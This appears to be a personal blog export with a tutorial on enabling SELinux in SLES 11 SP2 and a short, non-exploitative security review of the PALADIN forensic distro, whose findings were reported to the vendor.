<pre>btw: Thanks to Thomas Biege again..who is guiding me in not only one sec field... </pre>
Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-78052760890437815162013-04-17T11:08:00.001+08:002013-04-17T11:08:25.572+08:00How to enable SELinux in SLES 11 SP2I've been playing with SELinux for a few days. Once you decide to hack on SELinux, which means a very long hacking journey is begin. The 1st shit you need to do is to enable the SELinux before you dive into the details. Yes, you may already knew these great stuff could help your great SELinux hacking journey:<br />
<br />
1, <a href="http://selinuxproject.org/page/Main_Page" target="_blank">SELinux project wiki</a><br />
2, <a href="http://www.freetechbooks.com/the-selinux-notebook-the-foundations-t785.html" target="_blank">The SELinux Notebook - The Foundations - 3rd Edition</a> <br />
<br />
The SELinux kernel module has already compiled in SUSE Linux Enterprise Server 11 SP2 but without any specific polices. OK then, I've bullshit a lot, haven't I? Please allow me bullshit a lot more;-)<br />
<br />
Firstly, make sure SELS 11 SP2 is working well:<br />
-------------------------------------------------------------------------------- <br />
shawn-fortress:~ # cat /etc/issue<br /><br />Welcome to SUSE Linux Enterprise Server 11 SP2 (i586) - Kernel \r (\l).<br />
-------------------------------------------------------------------------------- <br />
<br />
Install these packages which are needed for SELinux:<br />
-------------------------------------------------------------------------------- <br />
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils<br />--------------------------------------------------------------------------------<br />
<br />
<br />Type "yast2 bootloader" in cmdline and add:<br />
-------------------------------------------------------------------------------- <br />
"security=selinux selinux=1 enforcing=0" into the kernel cmdline<br />
--------------------------------------------------------------------------------<br />
In GRUB bootloader, these above 3 options are used related to SELinux.<br />
* security=selinux, tells the kernel to use SELinux and not AppArmor<br />
* selinux=1, switches on SELinux<br />
* enforcing=0, puts SELinux in permissive mode( only logging)<br />
<br />
<br />
Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":<br />
-------------------------------------------------------------------------------- <br />http://software.opensuse.org/package/selinux-tools<br />--------------------------------------------------------------------------------<br />
<br />Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":<br />
-------------------------------------------------------------------------------- <br />http://software.opensuse.org/package/selinux-policy<br />--------------------------------------------------------------------------------<br />
<br />
Add selinux to existing PAM config file:<br />
-------------------------------------------------------------------------------- <br />
pam-config -a --selinux<br />
-------------------------------------------------------------------------------- <br /><br />
set restorecond service to runlevel 3 in "expert mode":<br />
-------------------------------------------------------------------------------- <br />yast2 runlevel<br />--------------------------------------------------------------------------------<br />
<br />Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:<br />
<br />shawn-fortress:~ # sestatus <br />SELinux status: enabled<br />SELinuxfs mount: /selinux<br />Current mode: permissive<br />Mode from config file: permissive<br />Policy version: 26<br />Policy from config file: refpolicy-standard<br />
<br />
See, it's working!<br />
<br />
Thanks to Thomas Biege who is guiding me on this journey! Thomas's article "<a href="http://thetoms-random-thoughts.blogspot.com/2008/12/selinux-on-opensuse-111.html" target="_blank">SELinux on openSUSE 11.1</a>" helped me to understand the config of SELinux in big picture.<br />
<br />
May L0rd's hacking spirit guide us!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com1tag:blogger.com,1999:blog-35345954.post-41369514841022656312013-04-01T13:01:00.000+08:002013-04-02T13:31:06.144+08:00Vuln assessment for PALADIN forensic tools free versionI went to the China Mac Forensic Conference last week. This was my 1st time I attended a security con about forensic. Some of security guys gave us a few free speech and it's all about forensic. In forenisc field, the only stuff I've know its <a href="http://www.rootkit.nl/projects/lynis.html" target="_blank">Lynis</a> which was written by <a href="http://www.rootkit.nl/about/" target="_blank">Michael Boelen</a>. They were talking about forensic stuff on Mac/iOS platforms in the morning. That made me a little boring. But what else can I blame about? This conference is called Mac-Forensic*. Fortunately, I found something very interesting at the afternoon. A company named <a href="http://sumuri.com/" target="_blank">SUMURI</a> providing a forensic solution which based on GNU/Linux. This GNU/Linux distro is called "PALADIN". I got a free Live-DVD and booted it up in scene. Well, I was fuc* exicting because I got tens of shitloads of information about Mac/iOS in that day. Now I had something I'm familiar with: GNU/Linux. I found some potential risks for PALADIN GNU/Linux distro. I've already notified them. Hope they could spend more time on sec stuff.<br />
<br />
OK. When PALADIN booted up, you can see the ubuntu-like( Unity?) GUI: <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYz4Qqh7KJq0PiBqOAsEFBLuY8LGIE9SJcORll96hyphenhyphenBy_GSC6eTG4CdPkZYCX2-zNU17kqRvZZNUYibLOz6CKwo0miQZBYq4-WYqICjnYHS8jqcQA2LjyMG0Uhxjg-op9eAvmSbw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYz4Qqh7KJq0PiBqOAsEFBLuY8LGIE9SJcORll96hyphenhyphenBy_GSC6eTG4CdPkZYCX2-zNU17kqRvZZNUYibLOz6CKwo0miQZBYq4-WYqICjnYHS8jqcQA2LjyMG0Uhxjg-op9eAvmSbw/s640/1.png" width="640" /></a></div>
<br />
PALADIN provides a lot of open source forensic tools:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Qxl7VTX5IZv20jgcxMuDNfh16Frsvx_CJxkJtBsb0peSVL4HUOpRmPXLPttC7wFYAEvT7pb7QeZxUCSvpZYCb_eyQwD4cjUEGg-z6m2pxVAOQclR3MguF1ECaiV3s-rWfn5Zgg/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Qxl7VTX5IZv20jgcxMuDNfh16Frsvx_CJxkJtBsb0peSVL4HUOpRmPXLPttC7wFYAEvT7pb7QeZxUCSvpZYCb_eyQwD4cjUEGg-z6m2pxVAOQclR3MguF1ECaiV3s-rWfn5Zgg/s640/2.png" width="640" /></a></div>
<br />
In the free version, the only closed-tool is "PALADIN Toolbox" which can be found in the Desktop and the binary file is located in /usr/bin/toolbox. This binary is using many free/open source libraries. The 1st potential issue is violation of free/open source licenses. Then I asked <span class="gI"><span class="gD" name="Steve Whalen, CFCE">Steve Whalen "are you sure that toolbox has no violation of the free/open source licenses" in the scene. His answer is pretty sure that the toolbox won't be violated any free/open source licenses:</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Oy5Y55c4bWTXeZ81kPqOaAwcvtBM6-pM_7rzrWh3OfRLIXqBSv8I4JZiJIpPEmbRm08rRm1taYDmTKaPU1j3RK_8GccKS43t3qwZkXVjHsuwvJxZ4dlHqGw4XdlPpIRRFvxmRA/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6Oy5Y55c4bWTXeZ81kPqOaAwcvtBM6-pM_7rzrWh3OfRLIXqBSv8I4JZiJIpPEmbRm08rRm1taYDmTKaPU1j3RK_8GccKS43t3qwZkXVjHsuwvJxZ4dlHqGw4XdlPpIRRFvxmRA/s640/3.png" width="640" /></a></div>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE"><br /></span></span>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE">Then, I took a few mins to investigation on the binary. Firstly, the entry address:</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiktBqgWh5bn97qLoVCTqfY_nA5Dr3l8R40KSKnifnoeg6ykkDWqnHa2dSdkwfJrtAt8sXoqOxAo2MCCbK0yplBkC7wDkClyA7N0s3KRVUmSa4ZlMv8O_cffDb_Qt_Sdf7-gfn9tw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiktBqgWh5bn97qLoVCTqfY_nA5Dr3l8R40KSKnifnoeg6ykkDWqnHa2dSdkwfJrtAt8sXoqOxAo2MCCbK0yplBkC7wDkClyA7N0s3KRVUmSa4ZlMv8O_cffDb_Qt_Sdf7-gfn9tw/s640/4.png" width="640" /></a></div>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE"><br /></span></span>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE">And, it doesn't have any anti-debugging features( <a href="https://github.com/citypw/citypw-SCFE/tree/master/security/anti-debug" target="_blank">my examples</a>) in it. If your asset is a closed-source binary. You should do anti-debug. A skilled reverse engineer is able to find the security issue by reversing the binary in very *short* time: </span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSk0QoSxvlybBflWDzPwsguxS36kueso04Pk-WEtFO7pAOJPMYk4xixAoBBRADgb30C9G76TSMZx_c7KYKFouwZpMRqZOJz_zyImE7zd5zpHSPM0x9h0H8ex7Uisi3b_pI9sugw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSk0QoSxvlybBflWDzPwsguxS36kueso04Pk-WEtFO7pAOJPMYk4xixAoBBRADgb30C9G76TSMZx_c7KYKFouwZpMRqZOJz_zyImE7zd5zpHSPM0x9h0H8ex7Uisi3b_pI9sugw/s640/5.png" width="640" /></a></div>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE"><br /></span></span>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE">ASLR is turned on. "2" is very good, which means the kernel do the randomize for stack and heap separately. AFAIK, the issue is the ASLR only work with PIE.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsZ3Env3sszH7VUiRm55UNwsm05GF-_htO-NqV3S-HLQzu0lbtjf7G9nq0y8ZhQpB51D8Th1UhA1-jghisPcLmrXS19RFQEiNjrMrgfPWL_JBJUsufvW49j6ths9UEePQlTZa8jQ/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsZ3Env3sszH7VUiRm55UNwsm05GF-_htO-NqV3S-HLQzu0lbtjf7G9nq0y8ZhQpB51D8Th1UhA1-jghisPcLmrXS19RFQEiNjrMrgfPWL_JBJUsufvW49j6ths9UEePQlTZa8jQ/s640/6.png" width="640" /></a></div>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE"><br /></span></span>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE"><a href="http://www.isg.rhul.ac.uk/tls/" target="_blank">Lucky Thirteen Attack</a> is a big issue recently. The current openssl version is affected.</span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizOprQ9VYhYqYkR3c2RfHuf_1nNp48mVHETG3om79UtwJSPo0hQxntos2catl-hiW24pg4KICKe9JtMrZVR70Nzj6PRfswHm_l5mnOooWu_g2dmChn41da03yjOZ1sbul0WNzYfQ/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizOprQ9VYhYqYkR3c2RfHuf_1nNp48mVHETG3om79UtwJSPo0hQxntos2catl-hiW24pg4KICKe9JtMrZVR70Nzj6PRfswHm_l5mnOooWu_g2dmChn41da03yjOZ1sbul0WNzYfQ/s640/7.png" width="640" /></a></div>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE"><br /></span></span>
<span class="gI"><span class="gD" name="Steve Whalen, CFCE">Well, this is it. I've done the investigation when a guy told me it's time to smb break. I'm very happy to see the company like SUMURI brings GNU/Linux into the forensic field. </span></span>Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0